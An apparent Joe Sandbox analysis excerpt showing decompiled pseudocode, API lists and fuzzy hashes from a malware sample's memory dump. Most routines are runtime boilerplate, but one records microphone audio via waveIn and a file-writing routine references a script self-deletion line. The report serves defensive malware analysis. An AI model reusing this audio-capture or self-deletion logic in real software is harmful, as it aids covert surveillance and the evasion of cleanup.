                    				return  *((intOrPtr*)(E0043FFBD()));
                    			}
































                    0x0045662a
                    0x00456634
                    0x00456637
                    0x0045663e
                    0x00456645
                    0x0045664a
                    0x0045664d
                    0x00456653
                    0x00456666
                    0x0045666d
                    0x00456670
                    0x00456672
                    0x00456675
                    0x00000000
                    0x00000000
                    0x0045667b
                    0x0045667b
                    0x0045667d
                    0x0045667d
                    0x00456680
                    0x00456682
                    0x00456685
                    0x00456763
                    0x00456763
                    0x00456765
                    0x0045671c
                    0x00456720
                    0x00456724
                    0x0045672e
                    0x00456731
                    0x004567b2
                    0x004567b2
                    0x004567b4
                    0x00000000
                    0x004567b4
                    0x00456733
                    0x00456738
                    0x00000000
                    0x00456738
                    0x00456767
                    0x0045676d
                    0x0045676e
                    0x00456775
                    0x0045677c
                    0x0045677f
                    0x00456782
                    0x00000000
                    0x00000000
                    0x0045678c
                    0x00456792
                    0x00456794
                    0x00000000
                    0x00000000
                    0x0045679b
                    0x004567a1
                    0x004567ae
                    0x00000000
                    0x004567ae
                    0x00456769
                    0x0045676b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0045676b
                    0x0045668b
                    0x00456695
                    0x004566a1
                    0x004566a4
                    0x004566a5
                    0x004566a7
                    0x004566c5
                    0x004566c8
                    0x004566cb
                    0x004566cc
                    0x004566cc
                    0x004566ce
                    0x004566e1
                    0x004566e1
                    0x004566e3
                    0x004566e6
                    0x004566eb
                    0x004566ee
                    0x004566f1
                    0x0045673c
                    0x00456741
                    0x00456744
                    0x0045674b
                    0x0045674b
                    0x00456751
                    0x00456751
                    0x00456759
                    0x0045675f
                    0x00000000
                    0x0045675f
                    0x004566f3
                    0x004566f4
                    0x004566f6
                    0x004566f9
                    0x004566fb
                    0x004566fe
                    0x00456700
                    0x004566da
                    0x004566da
                    0x00000000
                    0x004566da
                    0x00456702
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00456702
                    0x004566d0
                    0x00000000
                    0x00000000
                    0x004566d2
                    0x004566d8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00456704
                    0x00456704
                    0x00456704
                    0x0045670c
                    0x00456712
                    0x00456717
                    0x0045671a
                    0x0045671a
                    0x00000000
                    0x0045671a
                    0x004566ae
                    0x00000000
                    0x004566ae
                    0x0045668d
                    0x0045668f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0045668f
                    0x00456655
                    0x00000000

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: TUE$TUE
                    • API String ID: 269201875-54132396
                    • Opcode ID: f27b8dd734dfcfc1f731f8afd8f9345a37e6bdbca6ccc74c6bc629f6d78af340
                    • Instruction ID: 533e090f1f8b81d743e63f821601eec10811babdd1d883cc6fadc055898b510e
                    • Opcode Fuzzy Hash: f27b8dd734dfcfc1f731f8afd8f9345a37e6bdbca6ccc74c6bc629f6d78af340
                    • Instruction Fuzzy Hash: 42412E31A0011067DB206B7E8C8666F3664DF0A379F55026FFC14D7293EB7C8D4956AE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E0044ADCB(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				signed char _v15;
                    				char _v16;
                    				void _v24;
                    				short _v28;
                    				char _v31;
                    				void _v32;
                    				long _v36;
                    				intOrPtr _v40;
                    				void* _v44;
                    				signed int _v48;
                    				signed char* _v52;
                    				long _v56;
                    				int _v60;
                    				signed int _t78;
                    				signed int _t80;
                    				int _t86;
                    				void* _t94;
                    				long _t97;
                    				void _t105;
                    				void* _t112;
                    				signed int _t116;
                    				signed int _t118;
                    				signed char _t123;
                    				signed char _t128;
                    				intOrPtr _t129;
                    				signed int _t131;
                    				signed char* _t133;
                    				intOrPtr* _t135;
                    				signed int _t136;
                    				void* _t137;
                    
                    				_t78 =  *0x47000c; // 0xc3a97826
                    				_v8 = _t78 ^ _t136;
                    				_t80 = _a8;
                    				_t118 = _t80 >> 6;
                    				_t116 = (_t80 & 0x0000003f) * 0x30;
                    				_t133 = _a12;
                    				_v52 = _t133;
                    				_v48 = _t118;
                    				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x471810 + _t118 * 4)) + _t116 + 0x18));
                    				_v40 = _a16 + _t133;
                    				_t86 = GetConsoleCP();
                    				_t135 = _a4;
                    				_v60 = _t86;
                    				 *_t135 = 0;
                    				 *((intOrPtr*)(_t135 + 4)) = 0;
                    				 *((intOrPtr*)(_t135 + 8)) = 0;
                    				while(_t133 < _v40) {
                    					_v28 = 0;
                    					_v31 =  *_t133;
                    					_t129 =  *((intOrPtr*)(0x471810 + _v48 * 4));
                    					_t123 =  *(_t129 + _t116 + 0x2d);
                    					if((_t123 & 0x00000004) == 0) {
                    						if(( *(E00445542(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                    							_push(1);
                    							_push(_t133);
                    							goto L8;
                    						} else {
                    							if(_t133 >= _v40) {
                    								_t131 = _v48;
                    								 *((char*)( *((intOrPtr*)(0x471810 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                    								 *( *((intOrPtr*)(0x471810 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x471810 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                    								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                    							} else {
                    								_t112 = E00449831( &_v28, _t133, 2);
                    								_t137 = _t137 + 0xc;
                    								if(_t112 != 0xffffffff) {
                    									_t133 =  &(_t133[1]);
                    									goto L9;
                    								}
                    							}
                    						}
                    					} else {
                    						_t128 = _t123 & 0x000000fb;
                    						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                    						_push(2);
                    						_v15 = _t128;
                    						 *(_t129 + _t116 + 0x2d) = _t128;
                    						_push( &_v16);
                    						L8:
                    						_push( &_v28);
                    						_t94 = E00449831();
                    						_t137 = _t137 + 0xc;
                    						if(_t94 != 0xffffffff) {
                    							L9:
                    							_t133 =  &(_t133[1]);
                    							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                    							_v56 = _t97;
                    							if(_t97 != 0) {
                    								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                    									L19:
                    									 *_t135 = GetLastError();
                    								} else {
                    									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                    									if(_v36 >= _v56) {
                    										if(_v31 != 0xa) {
                    											goto L16;
                    										} else {
                    											_t105 = 0xd;
                    											_v32 = _t105;
                    											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                    												goto L19;
                    											} else {
                    												if(_v36 >= 1) {
                    													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                    													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                    													goto L16;
                    												}
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    					goto L20;
                    					L16:
                    				}
                    				L20:
                    				return E004349BB(_v8 ^ _t136);
                    			}


































                    0x0044add3
                    0x0044adda
                    0x0044addd
                    0x0044ade5
                    0x0044ade9
                    0x0044adf5
                    0x0044adf8
                    0x0044adfb
                    0x0044ae02
                    0x0044ae0a
                    0x0044ae0d
                    0x0044ae13
                    0x0044ae19
                    0x0044ae1e
                    0x0044ae20
                    0x0044ae23
                    0x0044ae28
                    0x0044ae32
                    0x0044ae39
                    0x0044ae3c
                    0x0044ae43
                    0x0044ae4a
                    0x0044ae76
                    0x0044ae9c
                    0x0044ae9e
                    0x00000000
                    0x0044ae78
                    0x0044ae7b
                    0x0044af42
                    0x0044af4e
                    0x0044af59
                    0x0044af5e
                    0x0044ae81
                    0x0044ae88
                    0x0044ae8d
                    0x0044ae93
                    0x0044ae99
                    0x00000000
                    0x0044ae99
                    0x0044ae93
                    0x0044ae7b
                    0x0044ae4c
                    0x0044ae50
                    0x0044ae53
                    0x0044ae59
                    0x0044ae5b
                    0x0044ae5e
                    0x0044ae62
                    0x0044ae9f
                    0x0044aea2
                    0x0044aea3
                    0x0044aea8
                    0x0044aeae
                    0x0044aeb4
                    0x0044aec3
                    0x0044aec9
                    0x0044aecf
                    0x0044aed4
                    0x0044aef0
                    0x0044af63
                    0x0044af69
                    0x0044aef2
                    0x0044aefa
                    0x0044af03
                    0x0044af09
                    0x00000000
                    0x0044af0b
                    0x0044af0d
                    0x0044af10
                    0x0044af29
                    0x00000000
                    0x0044af2b
                    0x0044af2f
                    0x0044af31
                    0x0044af34
                    0x00000000
                    0x0044af34
                    0x0044af2f
                    0x0044af29
                    0x0044af09
                    0x0044af03
                    0x0044aef0
                    0x0044aed4
                    0x0044aeae
                    0x00000000
                    0x0044af37
                    0x0044af37
                    0x0044af6b
                    0x0044af7d

                    APIs
                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044B540,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044AE0D
                    • __fassign.LIBCMT ref: 0044AE88
                    • __fassign.LIBCMT ref: 0044AEA3
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044AEC9
                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044B540,00000000,?,?,?,?,?,?,?,?,?,0044B540,?), ref: 0044AEE8
                    • WriteFile.KERNEL32(?,?,00000001,0044B540,00000000,?,?,?,?,?,?,?,?,?,0044B540,?), ref: 0044AF21
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                    • String ID:
                    • API String ID: 1324828854-0
                    • Opcode ID: ffb245f1d90130c28f686f0c48330db5c9d57c1a4d762e68918fb7bd0aa483e9
                    • Instruction ID: caa045230975ad53e222de6f2a48bb7732d7a12257bad1373cc2dfabf1c11634
                    • Opcode Fuzzy Hash: ffb245f1d90130c28f686f0c48330db5c9d57c1a4d762e68918fb7bd0aa483e9
                    • Instruction Fuzzy Hash: 7251E4B19402099FDB10CFA8DC81AEEBBF8EF09300F14412FE955E7291D7349955CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0040186A(void* __edx, intOrPtr _a8, intOrPtr _a16) {
                    				char _v32;
                    				void* _v52;
                    				char _v64;
                    				void* _v76;
                    				char _v96;
                    				void* _v100;
                    				char _v120;
                    				void* _v124;
                    				char _v144;
                    				void* _v148;
                    				char _v168;
                    				void* _v172;
                    				char _v192;
                    				void* _v196;
                    				char _v216;
                    				char _v220;
                    				char _v232;
                    				char _v240;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t28;
                    				void* _t32;
                    				void* _t33;
                    				void* _t34;
                    				signed int _t59;
                    				void* _t107;
                    				void* _t121;
                    				signed int _t122;
                    				void* _t124;
                    
                    				_t107 = __edx;
                    				_t124 = (_t122 & 0xfffffff8) - 0xdc;
                    				if( *0x475ba8 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
                    					E00433E04(0x475ba8);
                    					_t127 =  *0x475ba8 - 0xffffffff;
                    					if( *0x475ba8 == 0xffffffff) {
                    						E004046F7(0x475b28, _t121, 0);
                    						E0043418E(_t127, E00457940);
                    						E00433DC5(0x475ba8, 0x475ba8);
                    					}
                    				}
                    				E004020DF(0,  &_v220);
                    				_t28 = _a8 - 0x3be;
                    				if(_t28 == 0) {
                    					L10:
                    					 *0x475bac = 0;
                    					goto L11;
                    				} else {
                    					if(_t28 != 0) {
                    						L11:
                    						return E00401FD8();
                    					}
                    					_t130 =  *0x471a84 - 1;
                    					if( *0x471a84 != 1) {
                    						_t32 = E00401E65(0x473d40, _t107, _t121, _t130,  *0x475bac);
                    						_t33 = E004020B7(0,  &_v32, _t107, _t121, _t130, _a16, 0x20);
                    						_t34 = E004020B7(0,  &_v64, _t107, _t121, _t130, 0x471aa8, 0x12);
                    						_t113 = E00402F10(0,  &_v192, E00402EA1( &_v168, E00402F10(0,  &_v144, E00402EA1( &_v120, E00402F31( &_v96, 0x473d80, _t121, 0x473ec8), _t34), _t121, _t130, 0x473ec8), _t33), _t121, _t130, 0x473ec8);
                    						E00401FE2( &_v240, _t39, 0x473ec8, E00402F10(0,  &_v216, _t39, _t121, _t130, _t32));
                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
                    						E00401FD8();
                    						waveInUnprepareHeader( *0x471ac8, ( *0x475bac << 5) +  *0x473d7c, 0x20);
                    						E004017EC( *0x475bac, _t39, _t130);
                    						_t131 =  *0x475b2c - 0xffffffff;
                    						if( *0x475b2c == 0xffffffff) {
                    							E0040482D(0x475b28);
                    							E004048C8(0x475b28, 0x473ec8, 0x475b28);
                    						}
                    						E004020F6(0, _t124 - 0x18, _t113, _t131,  &_v232);
                    						_push(0x61);
                    						E00404AA1(0x475b28, _t113, _t131);
                    						_t59 =  *0x475bac + 1;
                    						 *0x475bac = _t59;
                    						if(_t59 < 2) {
                    							goto L11;
                    						} else {
                    							goto L10;
                    						}
                    					}
                    					E00404E26(_t107);
                    					ExitThread(0);
                    				}
                    			}

































                    0x0040186a
                    0x00401876
                    0x00401893
                    0x0040189b
                    0x004018a0
                    0x004018a8
                    0x004018ad
                    0x004018b7
                    0x004018be
                    0x004018c3
                    0x004018a8
                    0x004018c8
                    0x004018d0
                    0x004018d5
                    0x00401a55
                    0x00401a55
                    0x00000000
                    0x004018db
                    0x004018df
                    0x00401a5b
                    0x00401a6a
                    0x00401a6a
                    0x004018e5
                    0x004018ec
                    0x00401907
                    0x0040191f
                    0x00401934
                    0x00401983
                    0x00401994
                    0x0040199d
                    0x004019a6
                    0x004019af
                    0x004019b8
                    0x004019c4
                    0x004019d0
                    0x004019dc
                    0x004019e8
                    0x00401a04
                    0x00401a10
                    0x00401a15
                    0x00401a1c
                    0x00401a20
                    0x00401a28
                    0x00401a28
                    0x00401a37
                    0x00401a3c
                    0x00401a40
                    0x00401a4a
                    0x00401a4b
                    0x00401a53
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00401a53
                    0x004018f0
                    0x004018f6
                    0x004018f6

                    APIs
                    • __Init_thread_footer.LIBCMT ref: 004018BE
                    • ExitThread.KERNEL32 ref: 004018F6
                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EC8,00000000), ref: 00401A04
                      • Part of subcall function 0043418E: __onexit.LIBCMT ref: 00434194
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                    • String ID: ([G$8O}$x;{
                    • API String ID: 1649129571-1005883740
                    • Opcode ID: d4104156ce5bba4ab488b5f8f169dd0923fd36c982976cd6b9f8a2ba9e943a6d
                    • Instruction ID: 38ea03fd37dc2c2e3a4bd73c5eab910d2c96f14d87cc32f1be744f0a5288e387
                    • Opcode Fuzzy Hash: d4104156ce5bba4ab488b5f8f169dd0923fd36c982976cd6b9f8a2ba9e943a6d
                    • Instruction Fuzzy Hash: 3A41D1326042005BC324FB26DD86ABE73A5AB84315F00453FF54AA61F2DF786986CB1E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E00456563(char* _a4, short* _a8) {
                    				int _v8;
                    				void* __ecx;
                    				void* __esi;
                    				short* _t10;
                    				short* _t14;
                    				int _t15;
                    				short* _t16;
                    				void* _t26;
                    				int _t27;
                    				void* _t29;
                    				short* _t35;
                    				short* _t39;
                    				short* _t40;
                    
                    				_push(_t29);
                    				if(_a4 != 0) {
                    					_t39 = _a8;
                    					__eflags = _t39;
                    					if(__eflags != 0) {
                    						_push(_t26);
                    						E00447FF0(_t29, _t39, __eflags);
                    						asm("sbb ebx, ebx");
                    						_t35 = 0;
                    						_t27 = _t26 + 1;
                    						 *_t39 = 0;
                    						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
                    						_v8 = _t10;
                    						__eflags = _t10;
                    						if(_t10 != 0) {
                    							_t40 = E00445B29(_t29, _t10 + _t10);
                    							__eflags = _t40;
                    							if(_t40 != 0) {
                    								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
                    								__eflags = _t15;
                    								if(_t15 != 0) {
                    									_t16 = _t40;
                    									_t40 = 0;
                    									_t35 = 1;
                    									__eflags = 1;
                    									 *_a8 = _t16;
                    								} else {
                    									E0043FF87(GetLastError());
                    								}
                    							}
                    							E00446172(_t40);
                    							_t14 = _t35;
                    						} else {
                    							E0043FF87(GetLastError());
                    							_t14 = 0;
                    						}
                    					} else {
                    						 *((intOrPtr*)(E0043FFBD())) = 0x16;
                    						E0043B6B0();
                    						_t14 = 0;
                    					}
                    					return _t14;
                    				}
                    				 *((intOrPtr*)(E0043FFBD())) = 0x16;
                    				E0043B6B0();
                    				return 0;
                    			}
















                    0x00456568
                    0x0045656d
                    0x00456587
                    0x0045658a
                    0x0045658c
                    0x004565a5
                    0x004565a7
                    0x004565ae
                    0x004565b0
                    0x004565b9
                    0x004565ba
                    0x004565be
                    0x004565c4
                    0x004565c7
                    0x004565c9
                    0x004565e3
                    0x004565e6
                    0x004565e8
                    0x004565f5
                    0x004565fb
                    0x004565fd
                    0x00456611
                    0x00456613
                    0x00456617
                    0x00456617
                    0x00456618
                    0x004565ff
                    0x00456606
                    0x0045660b
                    0x004565fd
                    0x0045661b
                    0x00456620
                    0x004565cb
                    0x004565d2
                    0x004565d7
                    0x004565d7
                    0x0045658e
                    0x00456593
                    0x00456599
                    0x0045659e
                    0x0045659e
                    0x00000000
                    0x00456625
                    0x00456574
                    0x0045657a
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d941a9d504b72f1b67d3dbbae32bfdfbe06ee8c27e1d7f16dcb55b6db8afb32f
                    • Instruction ID: 89727e71a403e09b88f0cc17a9beff4a6a4441876a44c5155a229269d1304615
                    • Opcode Fuzzy Hash: d941a9d504b72f1b67d3dbbae32bfdfbe06ee8c27e1d7f16dcb55b6db8afb32f
                    • Instruction Fuzzy Hash: AF11E772504214BBDB202F739C0995B7AACEF86726F11062FFC15D7252DE38C80586A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041BE86(long __edx, WCHAR* _a4, long _a8) {
                    				long _v4;
                    				intOrPtr _t8;
                    				long _t9;
                    				struct _OVERLAPPED* _t19;
                    				void* _t20;
                    				long _t21;
                    				long _t23;
                    				void* _t24;
                    				void* _t25;
                    
                    				_t1 =  &_a8; // 0x466050
                    				_t19 = 0;
                    				_t25 = _t20;
                    				_t23 = __edx;
                    				_t8 =  *_t1;
                    				if(_t8 == 0) {
                    					_t9 = 0x40000000;
                    					_t21 = 2;
                    				} else {
                    					if(_t8 != 1) {
                    						_t9 = _a8;
                    						_t21 = _a8;
                    					} else {
                    						_t9 = 4;
                    						_t21 = _t9;
                    					}
                    				}
                    				_t24 = CreateFileW(_a4, _t9, _t19, _t19, _t21, 0x80, _t19);
                    				if(_t24 != 0xffffffff) {
                    					if(_a8 != 1 || SetFilePointer(_t24, _t19, _t19, 2) != 0xffffffff) {
                    						if(WriteFile(_t24, _t25, _t23,  &_v4, _t19) != 0) {
                    							_t19 = 1;
                    						}
                    						CloseHandle(_t24);
                    						return _t19;
                    					} else {
                    						CloseHandle(_t24);
                    						goto L6;
                    					}
                    				} else {
                    					L6:
                    					return 0;
                    				}
                    			}












                    0x0041be87
                    0x0041be8e
                    0x0041be90
                    0x0041be93
                    0x0041be95
                    0x0041be97
                    0x0041beb1
                    0x0041beb6
                    0x0041be99
                    0x0041be9c
                    0x0041bea5
                    0x0041bea9
                    0x0041be9e
                    0x0041bea0
                    0x0041bea1
                    0x0041bea1
                    0x0041be9c
                    0x0041becb
                    0x0041bed0
                    0x0041bedb
                    0x0041bf07
                    0x0041bf09
                    0x0041bf09
                    0x0041bf0c
                    0x00000000
                    0x0041beed
                    0x0041beee
                    0x00000000
                    0x0041beee
                    0x0041bed2
                    0x0041bed2
                    0x00000000
                    0x0041bed2

                    APIs
                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0046B928,00000000,00000000,0040D202,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041BEC5
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041BEE2
                    • CloseHandle.KERNEL32(00000000), ref: 0041BEEE
                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041BEFF
                    • CloseHandle.KERNEL32(00000000), ref: 0041BF0C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreatePointerWrite
                    • String ID: P`F
                    • API String ID: 1852769593-1774155936
                    • Opcode ID: acd566770f1b332a14aab8f009b2c7c769b3f05b38debe60a9e10ccd5b166ea0
                    • Instruction ID: 64cdd3e366cc520519df73a4523b9d986889054ac37c921cf3f51269ab4a6490
                    • Opcode Fuzzy Hash: acd566770f1b332a14aab8f009b2c7c769b3f05b38debe60a9e10ccd5b166ea0
                    • Instruction Fuzzy Hash: 1111E171204715BFE6104E24EC89EFB779CEB42365F10062EF352D22C1CB648C828ABE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0045090A(intOrPtr _a4) {
                    				void* _t18;
                    				intOrPtr _t45;
                    
                    				_t45 = _a4;
                    				if(_t45 != 0) {
                    					E00450651(_t45, 7);
                    					_t2 = _t45 + 0x1c; // 0x1c
                    					E00450651(_t2, 7);
                    					_t3 = _t45 + 0x38; // 0x38
                    					E00450651(_t3, 0xc);
                    					_t4 = _t45 + 0x68; // 0x68
                    					E00450651(_t4, 0xc);
                    					_t5 = _t45 + 0x98; // 0x98
                    					E00450651(_t5, 2);
                    					E00446172( *((intOrPtr*)(_t45 + 0xa0)));
                    					E00446172( *((intOrPtr*)(_t45 + 0xa4)));
                    					E00446172( *((intOrPtr*)(_t45 + 0xa8)));
                    					_t9 = _t45 + 0xb4; // 0xb4
                    					E00450651(_t9, 7);
                    					_t10 = _t45 + 0xd0; // 0xd0
                    					E00450651(_t10, 7);
                    					_t11 = _t45 + 0xec; // 0xec
                    					E00450651(_t11, 0xc);
                    					_t12 = _t45 + 0x11c; // 0x11c
                    					E00450651(_t12, 0xc);
                    					_t13 = _t45 + 0x14c; // 0x14c
                    					E00450651(_t13, 2);
                    					E00446172( *((intOrPtr*)(_t45 + 0x154)));
                    					E00446172( *((intOrPtr*)(_t45 + 0x158)));
                    					E00446172( *((intOrPtr*)(_t45 + 0x15c)));
                    					return E00446172( *((intOrPtr*)(_t45 + 0x160)));
                    				}
                    				return _t18;
                    			}





                    0x00450910
                    0x00450915
                    0x0045091e
                    0x00450923
                    0x00450929
                    0x0045092e
                    0x00450934
                    0x00450939
                    0x0045093f
                    0x00450944
                    0x0045094d
                    0x00450958
                    0x00450963
                    0x0045096e
                    0x00450973
                    0x0045097c
                    0x00450981
                    0x0045098a
                    0x00450992
                    0x0045099b
                    0x004509a0
                    0x004509a9
                    0x004509ae
                    0x004509b7
                    0x004509c2
                    0x004509cd
                    0x004509d8
                    0x00000000
                    0x004509e8
                    0x004509ed

                    APIs
                      • Part of subcall function 00450651: _free.LIBCMT ref: 0045067A
                    • _free.LIBCMT ref: 00450958
                      • Part of subcall function 00446172: RtlFreeHeap.NTDLL(00000000,00000000,?,0045067F,00000000,00000000,00000000,00000000,?,00450923,00000000,00000007,00000000,?,00450E6E,00000000), ref: 00446188
                      • Part of subcall function 00446172: GetLastError.KERNEL32(00000000,?,0045067F,00000000,00000000,00000000,00000000,?,00450923,00000000,00000007,00000000,?,00450E6E,00000000,00000000), ref: 0044619A
                    • _free.LIBCMT ref: 00450963
                    • _free.LIBCMT ref: 0045096E
                    • _free.LIBCMT ref: 004509C2
                    • _free.LIBCMT ref: 004509CD
                    • _free.LIBCMT ref: 004509D8
                    • _free.LIBCMT ref: 004509E3
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 719b641e7aa68cce1ca71a9ac3f1e9b273e40145fff2dd68bd460a4051adc064
                    • Instruction ID: 57b6859f7d7cc7926afc59fe7e12e060ea607136db390aca40fc9df591a3292a
                    • Opcode Fuzzy Hash: 719b641e7aa68cce1ca71a9ac3f1e9b273e40145fff2dd68bd460a4051adc064
                    • Instruction Fuzzy Hash: AE11B431540704BAE621B772CC07FCB77AD9F41705F84481FB699AA053E6ACF9294745
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E00439D6A(void* __ecx) {
                    				void* _t4;
                    				void* _t11;
                    				void* _t16;
                    				long _t25;
                    				void* _t28;
                    
                    				if( *0x470090 != 0xffffffff) {
                    					_t25 = GetLastError();
                    					_t11 = E00438818(__eflags,  *0x470090);
                    					__eflags = _t11 - 0xffffffff;
                    					if(_t11 == 0xffffffff) {
                    						L5:
                    						_t11 = 0;
                    					} else {
                    						__eflags = _t11;
                    						if(__eflags == 0) {
                    							_t4 = E00438852(__eflags,  *0x470090, 0xffffffff);
                    							_pop(_t16);
                    							__eflags = _t4;
                    							if(_t4 != 0) {
                    								_t28 = E004454E5(_t16, 1, 0x28);
                    								__eflags = _t28;
                    								if(__eflags == 0) {
                    									L8:
                    									_t11 = 0;
                    									E00438852(__eflags,  *0x470090, 0);
                    								} else {
                    									__eflags = E00438852(__eflags,  *0x470090, _t28);
                    									if(__eflags != 0) {
                    										_t11 = _t28;
                    										_t28 = 0;
                    										__eflags = 0;
                    									} else {
                    										goto L8;
                    									}
                    								}
                    								E00446172(_t28);
                    							} else {
                    								goto L5;
                    							}
                    						}
                    					}
                    					SetLastError(_t25);
                    					return _t11;
                    				} else {
                    					return 0;
                    				}
                    			}








                    0x00439d71
                    0x00439d84
                    0x00439d8b
                    0x00439d8e
                    0x00439d91
                    0x00439daa
                    0x00439daa
                    0x00439d93
                    0x00439d93
                    0x00439d95
                    0x00439d9f
                    0x00439da5
                    0x00439da6
                    0x00439da8
                    0x00439db8
                    0x00439dbc
                    0x00439dbe
                    0x00439dd2
                    0x00439dd2
                    0x00439ddb
                    0x00439dc0
                    0x00439dce
                    0x00439dd0
                    0x00439de4
                    0x00439de6
                    0x00439de6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00439dd0
                    0x00439de9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00439da8
                    0x00439d95
                    0x00439df1
                    0x00439dfb
                    0x00439d73
                    0x00439d75
                    0x00439d75

                    APIs
